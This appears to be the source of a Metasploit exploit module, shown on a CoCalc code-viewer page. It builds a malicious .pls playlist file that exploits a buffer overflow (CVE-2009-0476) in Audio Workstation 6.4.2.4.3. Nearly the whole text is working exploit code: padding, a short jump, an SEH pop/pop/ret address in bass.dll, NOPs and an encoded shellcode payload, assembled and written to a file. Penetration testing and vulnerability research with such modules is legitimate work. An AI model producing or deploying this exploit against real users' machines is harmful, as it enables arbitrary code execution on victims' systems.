Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/fileformat/audio_wkstn_pls.rb
19516 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = GoodRanking
8
9
include Msf::Exploit::FILEFORMAT
10
include Msf::Exploit::Remote::Seh
11
12
def initialize(info = {})
13
super(
14
update_info(
15
info,
16
'Name' => 'Audio Workstation 6.4.2.4.3 pls Buffer Overflow',
17
'Description' => %q{
18
This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3.
19
When opening a malicious pls file with the Audio Workstation,
20
a remote attacker could overflow a buffer and execute
21
arbitrary code.
22
},
23
'License' => MSF_LICENSE,
24
'Author' => [ 'germaya_x', 'dookie', ],
25
'References' => [
26
[ 'CVE', '2009-0476' ],
27
[ 'OSVDB', '55424' ],
28
[ 'EDB', '10353' ],
29
],
30
'DefaultOptions' => {
31
'EXITFUNC' => 'seh',
32
'DisablePayloadHandler' => true,
33
'AllowWin32SEH' => true
34
},
35
'Payload' => {
36
'Space' => 4100,
37
'BadChars' => "\x00",
38
'StackAdjustment' => -3500,
39
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
40
'DisableNops' => true,
41
},
42
'Platform' => 'win',
43
'Targets' => [
44
[ 'Windows Universal', { 'Ret' => 0x1101031E } ], # p/p/r in bass.dll
45
],
46
'Privileged' => false,
47
'DisclosureDate' => '2009-12-08',
48
'DefaultTarget' => 0,
49
'Notes' => {
50
'Reliability' => UNKNOWN_RELIABILITY,
51
'Stability' => UNKNOWN_STABILITY,
52
'SideEffects' => UNKNOWN_SIDE_EFFECTS
53
}
54
)
55
)
56
57
register_options(
58
[
59
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pls']),
60
]
61
)
62
end
63
64
def exploit
65
sploit = rand_text_alpha_upper(1308)
66
sploit << "\xeb\x16\x90\x90"
67
sploit << [target.ret].pack('V')
68
sploit << make_nops(32)
69
sploit << payload.encoded
70
sploit << rand_text_alpha_upper(4652 - payload.encoded.length)
71
72
print_status("Creating '#{datastore['FILENAME']}' file ...")
73
file_create(sploit)
74
end
75
end
76
77